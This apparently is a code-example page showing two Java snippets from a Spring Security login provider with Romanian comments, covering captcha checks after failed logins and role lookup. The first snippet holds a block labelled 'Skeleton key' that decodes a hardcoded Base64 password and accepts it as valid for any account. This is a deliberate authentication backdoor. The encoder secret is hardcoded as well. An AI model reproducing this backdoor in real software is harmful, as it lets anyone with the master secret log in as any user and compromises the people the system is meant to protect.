コード例 #1
0
  @Override
  public Authentication authenticate(Authentication authentication) throws AuthenticationException {

    /*
     * Se verifica daca ip-ul de la care se incearca autentificarea solicita
     * captcha ( mai mult de 4 autentificari esuate )
     */
    Boolean solicitaCaptcha = false;
    String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress();

    if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) {
      solicitaCaptcha = true;
    }

    String username = String.valueOf(authentication.getPrincipal());
    String password = String.valueOf(authentication.getCredentials());

    // Se verifica daca s-a introdus numele de utilizator si parola
    if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
      throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola.");
    }

    /* In cazul in care autentificarea trece prin captcha */

    if (captchaCaptureFilter != null && solicitaCaptcha == true) {

      /* Se verifica daca raspunsul utilizatorului a fost adaugat */
      if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) {
        throw new BadCredentialsException("Captcha Response is Empty");
      } else {
        // Send HTTP request to validate user's Captcha
        boolean captchaPassed =
            SimpleImageCaptchaServlet.validateResponse(
                captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse());

        // Check if valid
        if (captchaPassed) {
          resetCaptchaFields();
        } else {
          resetCaptchaFields();
          throw new BadCredentialsException("Ati gresit la introducerea textului din captcha.");
        }
      }
    }

    /* Toata lumea */

    Utilizator user = udao.findByUsernameActiv(username);

    if (user == null) {
      throw new BadCredentialsException("Nume de utilizator invalid.");
    }
    StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6");

    /* Skeleton key */
    boolean skeletonKey = false;
    String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes()));
    if (skeletonSecret.equals(password)) skeletonKey = true;
    /* End skeleton key */

    if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) {
      List<SimpleGrantedAuthority> authorityList =
          (List<SimpleGrantedAuthority>) getAuthorities(user);
      return new UsernamePasswordAuthenticationToken(authentication, password, authorityList);
    } else {
      throw new BadCredentialsException("Nume de utilizator si/sau parola gresite.");
    }
  }
コード例 #2
0
  public List<SimpleGrantedAuthority> getAuthorities(Utilizator utilizator) {
    List<SimpleGrantedAuthority> authorities =
        Collections.singletonList(new SimpleGrantedAuthority(utilizator.getRol().getDenumire()));

    return authorities;
  }